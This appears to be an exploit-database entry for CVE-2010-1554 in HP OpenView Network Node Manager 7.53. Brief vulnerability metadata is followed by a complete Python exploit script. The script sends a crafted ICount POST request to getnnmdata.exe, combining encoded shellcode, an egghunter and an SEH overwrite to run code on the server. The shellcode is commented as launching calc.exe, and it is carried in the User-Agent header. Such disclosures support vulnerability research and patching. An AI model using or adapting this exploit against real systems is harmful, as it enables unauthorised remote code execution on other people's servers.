HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution

vendor:

HP OpenView Network Node Manager

by:

S2 Crew

9.3

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: HP OpenView Network Node Manager

Affected Version From: 7.53

Affected Version To: 7.53

Patch Exists: NO

Related CWE: CVE-2010-1554

CPE: a:hp:openview_network_node_manager:7.53

Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0137/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0062/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-1201/

Other Scripts:

Platforms Tested: Windows 2003

2010

HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution

This exploit allows remote attackers to execute arbitrary code via a crafted ICount parameter in a CGI request to getnnmdata.exe. The vulnerability exists in HP OpenView Network Node Manager (NNM) and allows an attacker to execute arbitrary code with the same privileges as the NNM server.

Mitigation:

Apply the appropriate patch or update provided by the vendor.

Source

Exploit-DB raw data:

# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution 
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows 2003
# CVE: CVE-2010-1554

# Code :

#!/usr/bin/python

import struct
import socket
import httplib
import urllib

# calc.exe Windows Execute Command
sc2 = (
"\x89\xe7\xdb\xc4\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4a\x48\x4c\x49\x47\x70\x43\x30\x45\x50\x51\x70\x4f\x79"
"\x4d\x35\x50\x31\x4b\x62\x43\x54\x4e\x6b\x51\x42\x46\x50\x4e"
"\x6b\x50\x52\x46\x6c\x4e\x6b\x51\x42\x46\x74\x4c\x4b\x43\x42"
"\x47\x58\x46\x6f\x4f\x47\x42\x6a\x46\x46\x44\x71\x4b\x4f\x44"
"\x71\x4f\x30\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x46\x62\x44\x6c"
"\x45\x70\x4f\x31\x48\x4f\x44\x4d\x47\x71\x4a\x67\x4a\x42\x4c"
"\x30\x43\x62\x46\x37\x4c\x4b\x50\x52\x44\x50\x4c\x4b\x42\x62"
"\x45\x6c\x45\x51\x4e\x30\x4c\x4b\x47\x30\x50\x78\x4e\x65\x4b"
"\x70\x43\x44\x43\x7a\x43\x31\x4a\x70\x46\x30\x4e\x6b\x51\x58"
"\x42\x38\x4c\x4b\x46\x38\x47\x50\x43\x31\x4b\x63\x4b\x53\x47"
"\x4c\x42\x69\x4c\x4b\x45\x64\x4c\x4b\x45\x51\x4a\x76\x46\x51"
"\x4b\x4f\x45\x61\x49\x50\x4c\x6c\x4a\x61\x48\x4f\x44\x4d\x45"
"\x51\x4a\x67\x47\x48\x4b\x50\x44\x35\x4b\x44\x44\x43\x43\x4d"
"\x4a\x58\x47\x4b\x43\x4d\x51\x34\x51\x65\x4d\x32\x42\x78\x4c"
"\x4b\x43\x68\x47\x54\x47\x71\x4a\x73\x51\x76\x4c\x4b\x46\x6c"
"\x50\x4b\x4e\x6b\x42\x78\x45\x4c\x45\x51\x49\x43\x4c\x4b\x47"
"\x74\x4e\x6b\x47\x71\x4e\x30\x4d\x59\x47\x34\x46\x44\x44\x64"
"\x51\x4b\x43\x6b\x50\x61\x42\x79\x42\x7a\x50\x51\x49\x6f\x49"
"\x70\x43\x68\x51\x4f\x51\x4a\x4e\x6b\x45\x42\x4a\x4b\x4d\x56"
"\x43\x6d\x50\x6a\x47\x71\x4c\x4d\x4c\x45\x4e\x59\x45\x50\x45"
"\x50\x45\x50\x50\x50\x43\x58\x45\x61\x4e\x6b\x42\x4f\x4b\x37"
"\x4b\x4f\x4a\x75\x4d\x6b\x4c\x30\x4c\x75\x49\x32\x42\x76\x50"
"\x68\x4d\x76\x4a\x35\x4f\x4d\x4f\x6d\x4b\x4f\x49\x45\x47\x4c"
"\x43\x36\x51\x6c\x45\x5a\x4b\x30\x49\x6b\x4b\x50\x43\x45\x45"
"\x55\x4d\x6b\x42\x67\x47\x63\x51\x62\x42\x4f\x50\x6a\x45\x50"
"\x51\x43\x4b\x4f\x4b\x65\x45\x33\x43\x51\x50\x6c\x45\x33\x46"
"\x4e\x43\x55\x51\x68\x50\x65\x43\x30\x45\x5a\x41\x41"
)

egghunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30\x30\x57\x8b\xfa"
"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

ret = struct.pack('<L',0x5A667A77) # ppr
jmp1 = '\xeb\xf9\x90\x90'
jmp2 = '\xeb\xdd\x90\x90\x90'

p = 'Topo=X&SnmpVals=X&Hostname=X&ICount='+'9'*100+'A'*1917+egghunter+jmp2+jmp1 + ret + "C"*500

h = {"Content-Type": "application/x-www-form-urlencoded","Host":"172.16.29.149","User-Agent":"T00WT00W"+sc2}

c = httplib.HTTPConnection('172.16.29.149')
c.request("POST","/OvCgi/getnnmdata.exe",p,h)
r = c.getresponse()

print r.status, r.reason
data = r.read()
print data
c.close()

print "\nDone\n"